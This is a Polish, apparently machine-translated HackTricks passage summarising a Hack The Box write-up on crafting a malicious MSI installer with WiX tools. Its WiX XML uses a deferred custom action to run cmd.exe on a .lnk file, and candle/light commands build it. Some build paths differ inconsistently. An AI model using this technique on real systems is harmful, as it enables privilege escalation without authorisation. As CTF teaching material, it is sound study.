5.8 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Tworzenie złośliwego MSI i uzyskiwanie uprawnień roota
Tworzenie instalatora MSI zostanie wykonane przy użyciu narzędzi wixtools, a konkretnie wixtools zostanie wykorzystane. Warto wspomnieć, że próbowano również alternatywnych narzędzi do tworzenia MSI, ale nie były one skuteczne w tym konkretnym przypadku.
Aby w pełni zrozumieć przykłady użycia wix MSI, zaleca się zapoznanie się z tą stroną. Znajdziesz tutaj różne przykłady, które demonstrują użycie wix MSI.
Celem jest wygenerowanie MSI, które wykonuje plik lnk. Aby to osiągnąć, można użyć następującego kodu XML (xml stąd):
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
Warto zauważyć, że element Package zawiera atrybuty takie jak InstallerVersion i Compressed, określające wersję instalatora i wskazujące, czy pakiet jest skompresowany czy nie.
Proces tworzenia polega na wykorzystaniu narzędzia candle.exe z wixtools do wygenerowania obiektu wix z pliku msi.xml. Należy wykonać następujące polecenie:
candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
Dodatkowo, warto wspomnieć, że w poście dostarczono obraz przedstawiający polecenie i jego wynik. Możesz się do niego odwołać w celu uzyskania wizualnego wsparcia.
Ponadto, zostanie użyte narzędzie light.exe, kolejne narzędzie z wixtools, do utworzenia pliku MSI z obiektu wix. Polecenie do wykonania jest następujące:
light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix
Podobnie jak w poprzedniej komendzie, do posta dołączony jest obraz ilustrujący komendę i jej wynik.
Należy jednak zauważyć, że chociaż ten podsumowanie ma na celu dostarczenie wartościowych informacji, zaleca się odwołanie się do oryginalnego posta, aby uzyskać bardziej szczegółowe informacje i dokładne instrukcje.
Odwołania
- https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root
- https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with wixtools
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź SUBSCRIPTION PLANS!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.